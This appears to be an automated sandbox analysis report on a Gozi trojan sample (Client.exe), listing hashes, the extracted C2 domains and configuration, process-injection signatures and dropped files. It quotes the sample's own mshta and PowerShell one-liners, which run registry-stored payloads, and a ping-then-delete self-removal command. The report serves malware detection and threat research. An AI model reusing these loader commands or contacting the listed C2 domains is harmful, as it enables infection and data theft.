Analysis
-
max time kernel
151s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 08:56
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20230831-en
General
-
Target
Client.exe
-
Size
422KB
-
MD5
c788f8e7a2d0311297bd198ca9d05ec8
-
SHA1
64240992ba99ae27b0bb4fe277a95524a4b139db
-
SHA256
bf237f642cd049be1e0be68de0f3bd6ed97be7d05059fb2825f94fd0a5afebfd
-
SHA512
2295c28aa11e3c1ea09f0ba790ea1e8322b3c996f4f27bf0aec9edf0997329ea8d13b98417e856f7bd922f4a0d9ef786117b8354a04b752d53e6b53733db4f5d
-
SSDEEP
6144:eH0vsBFRMXdX0tn7qnmUVR9g0pHii2B8mG+R2FLxgwExgw:eH0v4FRyX0tnWnN9pHiN4+R2NxEx
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/3292-0-0x0000000001560000-0x000000000156C000-memory.dmp dave -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 2252 set thread context of 3160 2252 powershell.exe Explorer.EXE PID 3160 set thread context of 3720 3160 Explorer.EXE RuntimeBroker.exe PID 3160 set thread context of 4064 3160 Explorer.EXE RuntimeBroker.exe PID 3160 set thread context of 1692 3160 Explorer.EXE cmd.exe PID 3160 set thread context of 2000 3160 Explorer.EXE RuntimeBroker.exe PID 3160 set thread context of 2948 3160 Explorer.EXE RuntimeBroker.exe PID 1692 set thread context of 2932 1692 cmd.exe PING.EXE PID 3160 set thread context of 3184 3160 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2932 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Client.exepowershell.exeExplorer.EXEpid process 3292 Client.exe 3292 Client.exe 2252 powershell.exe 2252 powershell.exe 2252 powershell.exe 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3160 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 2252 powershell.exe 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 3160 Explorer.EXE 1692 cmd.exe 3160 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 2252 powershell.exe Token: SeShutdownPrivilege 3160 Explorer.EXE Token: SeCreatePagefilePrivilege 3160 Explorer.EXE Token: SeShutdownPrivilege 3160 Explorer.EXE Token: SeCreatePagefilePrivilege 3160 Explorer.EXE Token: SeShutdownPrivilege 3160 Explorer.EXE Token: SeCreatePagefilePrivilege 3160 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3160 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3160 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 4660 wrote to memory of 2252 4660 mshta.exe powershell.exe PID 4660 wrote to memory of 2252 4660 mshta.exe powershell.exe PID 2252 wrote to memory of 4852 2252 powershell.exe csc.exe PID 2252 wrote to memory of 4852 2252 powershell.exe csc.exe PID 4852 wrote to memory of 2728 4852 csc.exe cvtres.exe PID 4852 wrote to memory of 2728 4852 csc.exe cvtres.exe PID 2252 wrote to memory of 2632 2252 powershell.exe csc.exe PID 2252 wrote to memory of 2632 2252 powershell.exe csc.exe PID 2632 wrote to memory of 4608 2632 csc.exe cvtres.exe PID 2632 wrote to memory of 4608 2632 csc.exe cvtres.exe PID 2252 wrote to memory of 3160 2252 powershell.exe Explorer.EXE PID 2252 wrote to memory of 3160 2252 powershell.exe Explorer.EXE PID 2252 wrote to memory of 3160 2252 powershell.exe Explorer.EXE PID 2252 wrote to memory of 3160 2252 powershell.exe Explorer.EXE PID 3160 wrote to memory of 3720 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 3720 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 1692 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 1692 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 1692 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 3720 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 3720 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 4064 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 4064 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 4064 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 1692 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 4064 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 2000 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 2000 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 1692 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 2000 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 2000 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 2948 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 2948 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 2948 3160 Explorer.EXE RuntimeBroker.exe PID 3160 wrote to memory of 2948 3160 Explorer.EXE RuntimeBroker.exe PID 1692 wrote to memory of 2932 1692 cmd.exe PING.EXE PID 1692 wrote to memory of 2932 1692 cmd.exe PING.EXE PID 1692 wrote to memory of 2932 1692 cmd.exe PING.EXE PID 3160 wrote to memory of 3184 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 3184 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 3184 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 3184 3160 Explorer.EXE cmd.exe PID 1692 wrote to memory of 2932 1692 cmd.exe PING.EXE PID 1692 wrote to memory of 2932 1692 cmd.exe PING.EXE PID 3160 wrote to memory of 3184 3160 Explorer.EXE cmd.exe PID 3160 wrote to memory of 3184 3160 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Pono='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pono).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\79A35AC8-8476-1390-56BD-F8F7EA41AC1B\\\CharControl'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sasspqrts -value gp; new-alias -name qndrfqnodu -value iex; qndrfqnodu ([System.Text.Encoding]::ASCII.GetString((sasspqrts "HKCU:Software\AppDataLow\Software\Microsoft\79A35AC8-8476-1390-56BD-F8F7EA41AC1B").TimeAbout))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\leta0m15\leta0m15.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B4A.tmp" "c:\Users\Admin\AppData\Local\Temp\leta0m15\CSCA338201AE52B40748DD7B34F92235A1B.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ixanufpf\ixanufpf.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C25.tmp" "c:\Users\Admin\AppData\Local\Temp\ixanufpf\CSCEDBC93B74E10466EA17D921E4764D5B.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES5B4A.tmpFilesize
1KB
MD579c24f3d3231d2d75b48b7ce9cef1d0b
SHA1273283b27334e937d05c905fba9a2ef1c91884ca
SHA256a7804a770d3da2ca88879a2c32fedd39e6d3b01de07ef73e11b91d44bf9a37a9
SHA5120d6a1f8d37223b0b85ade2076d754a1d1fb8d9007a53fb04fdf127832d68b71ee505d84588e13e1e099e38dca8cf7035e2b635e169fc48aff5cf57d11a2a52f1
-
C:\Users\Admin\AppData\Local\Temp\RES5C25.tmpFilesize
1KB
MD5116970d4592f4ae23052217cf77515bc
SHA184d6e1ff1a255fca1492f740abbea38b4c44f23e
SHA256d4d9c959a593dc007fdb297d7b17b74fa53286b9360456bc8728b129a4deec5a
SHA51299aa401c1c0dfd0fff29baba83d0ac120bc0671b78818ee60cb1aa970ce28076c59771cb94075b3173651e8c7f9ab520f26f1c6b3b8fee28b6b619ca69be32da
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqqhaf5f.qgl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ixanufpf\ixanufpf.dllFilesize
3KB
MD505fe5aabad18a42fd35b72d765ea1b85
SHA18dc001edf577eb04fd372733114da30fbd70d0e9
SHA256a804a9fc4ff05096714fb7d3b32b138548ae92a7b95d72ee45ec3fbce13329b5
SHA5122969c790a6021c2a2c591f4590d00ae9d27f94c20e9860f80deef2efadd27af7df60c529cd5b33e98735b8cdb11fee19952446c80c1587e9e5840b6675d88555
-
C:\Users\Admin\AppData\Local\Temp\leta0m15\leta0m15.dllFilesize
3KB
MD5741d9f01c2afd1175a61086fae7f47ff
SHA1dd53ca6e21473548f3f140c9d1153253a4b2e4ca
SHA2564bbcb4724db01067f61aa89d9897c7cd837db49fd93e253f99cdfff25fbe3fcb
SHA512c419dd5d55809af42a5de1aceed7365e149d85ad8c62e574e589db6def6cd5764a1cc38e32b449a30d7203e1bac072cbb40ef48d4257735be7abd4a6993ce198
-
\??\c:\Users\Admin\AppData\Local\Temp\ixanufpf\CSCEDBC93B74E10466EA17D921E4764D5B.TMPFilesize
652B
MD522535186cc1930e1dc0affee4d38d56e
SHA1649b91f09303b8929a4865f2856d47d0e314b108
SHA256e6f24d8c986e33106fffa22ef37e6cadcc7af211879dc7d7e60abb2b0485a8b1
SHA5127192467d72e962a8f07adce074658abc731226a8d3516d19dcc0dcab730a3e556502a9f4c3f494c131610e1ee60a9c1b6069c20da20db63e14c5c5c000897b23
-
\??\c:\Users\Admin\AppData\Local\Temp\ixanufpf\ixanufpf.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\ixanufpf\ixanufpf.cmdlineFilesize
369B
MD5ecd8b84a1ee40187880b3cbcd23d6d1a
SHA137c72ee7c144cc2cc92e9f65a5d7e4ca769fce98
SHA25668299938b0266c4eec7aed03eeda2eff04b23eb418ac94568a683dba2318b0d3
SHA512368403dc434ab968437235550ee7d39355fafb2679c90f0025290cf8cffa9d717521cd64824f615c556d1bc69d8c8d0f581a51519fdee4caa9bde5cbd6df91ae
-
\??\c:\Users\Admin\AppData\Local\Temp\leta0m15\CSCA338201AE52B40748DD7B34F92235A1B.TMPFilesize
652B
MD5d6d93579fe9a553e1e7e999dbb325466
SHA120b4443085cee5a8d5d74d86904a3a31bd9e5a0d
SHA256bb9739bd1d1fa9d469d9b979a8d9904ec144aba1e62aefb6be4cf396028544a7
SHA512ecf99d2d0802a7ef75b47bedea4aadaaca6d7349acb8fc4d9541292681af000e6db6f232d8cbe17b0332a5a165aef92e81abbfbb9536ce25b0b5eead0f45bf10
-
\??\c:\Users\Admin\AppData\Local\Temp\leta0m15\leta0m15.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\leta0m15\leta0m15.cmdlineFilesize
369B
MD5f7df163ee2e5de94a2359407c63f2150
SHA1734911a6d3bb23cca05cf98e62b60ad01425f160
SHA25644471f29acbf6cea3d632a1dd18a1dec7d4c24aedaf3797cc34d464d07ab7138
SHA512cc2c08e9ba9638c4694087b56820a5bf3614b20eace0a896fd0797654d7714ddd1a62a7ac6a8176014f1e1cfed7349204585cadbe8d0065a828004bfef7d5a48
-
memory/1692-83-0x0000025C28E40000-0x0000025C28E41000-memory.dmpFilesize
4KB
-
memory/1692-80-0x0000025C28E90000-0x0000025C28F34000-memory.dmpFilesize
656KB
-
memory/1692-118-0x0000025C28E90000-0x0000025C28F34000-memory.dmpFilesize
656KB
-
memory/2000-119-0x000001AAE7FB0000-0x000001AAE8054000-memory.dmpFilesize
656KB
-
memory/2000-90-0x000001AAE5DC0000-0x000001AAE5DC1000-memory.dmpFilesize
4KB
-
memory/2000-87-0x000001AAE7FB0000-0x000001AAE8054000-memory.dmpFilesize
656KB
-
memory/2252-64-0x00007FFE7C4B0000-0x00007FFE7CF71000-memory.dmpFilesize
10.8MB
-
memory/2252-40-0x0000028051F10000-0x0000028051F18000-memory.dmpFilesize
32KB
-
memory/2252-54-0x0000028051F30000-0x0000028051F38000-memory.dmpFilesize
32KB
-
memory/2252-27-0x0000028051E00000-0x0000028051E10000-memory.dmpFilesize
64KB
-
memory/2252-56-0x00000280520B0000-0x00000280520ED000-memory.dmpFilesize
244KB
-
memory/2252-24-0x0000028051F40000-0x0000028051F62000-memory.dmpFilesize
136KB
-
memory/2252-25-0x00007FFE7C4B0000-0x00007FFE7CF71000-memory.dmpFilesize
10.8MB
-
memory/2252-26-0x0000028051E00000-0x0000028051E10000-memory.dmpFilesize
64KB
-
memory/2252-65-0x00000280520B0000-0x00000280520ED000-memory.dmpFilesize
244KB
-
memory/2932-120-0x000002D8E3330000-0x000002D8E33D4000-memory.dmpFilesize
656KB
-
memory/2932-103-0x000002D8E31D0000-0x000002D8E31D1000-memory.dmpFilesize
4KB
-
memory/2932-102-0x000002D8E3330000-0x000002D8E33D4000-memory.dmpFilesize
656KB
-
memory/2948-97-0x0000019813F00000-0x0000019813F01000-memory.dmpFilesize
4KB
-
memory/2948-121-0x0000019813E50000-0x0000019813EF4000-memory.dmpFilesize
656KB
-
memory/2948-95-0x0000019813E50000-0x0000019813EF4000-memory.dmpFilesize
656KB
-
memory/3160-105-0x00000000091C0000-0x0000000009264000-memory.dmpFilesize
656KB
-
memory/3160-58-0x00000000091C0000-0x0000000009264000-memory.dmpFilesize
656KB
-
memory/3160-59-0x00000000012D0000-0x00000000012D1000-memory.dmpFilesize
4KB
-
memory/3184-109-0x00000000013D0000-0x0000000001468000-memory.dmpFilesize
608KB
-
memory/3184-110-0x0000000000BE0000-0x0000000000BE1000-memory.dmpFilesize
4KB
-
memory/3184-116-0x00000000013D0000-0x0000000001468000-memory.dmpFilesize
608KB
-
memory/3292-11-0x00000000015A0000-0x00000000015AD000-memory.dmpFilesize
52KB
-
memory/3292-5-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/3292-0-0x0000000001560000-0x000000000156C000-memory.dmpFilesize
48KB
-
memory/3292-1-0x0000000001570000-0x000000000157F000-memory.dmpFilesize
60KB
-
memory/3720-72-0x000002AF26B30000-0x000002AF26B31000-memory.dmpFilesize
4KB
-
memory/3720-112-0x000002AF26F00000-0x000002AF26FA4000-memory.dmpFilesize
656KB
-
memory/3720-71-0x000002AF26F00000-0x000002AF26FA4000-memory.dmpFilesize
656KB
-
memory/4064-79-0x000001BD7A070000-0x000001BD7A071000-memory.dmpFilesize
4KB
-
memory/4064-77-0x000001BD7A0B0000-0x000001BD7A154000-memory.dmpFilesize
656KB
-
memory/4064-117-0x000001BD7A0B0000-0x000001BD7A154000-memory.dmpFilesize
656KB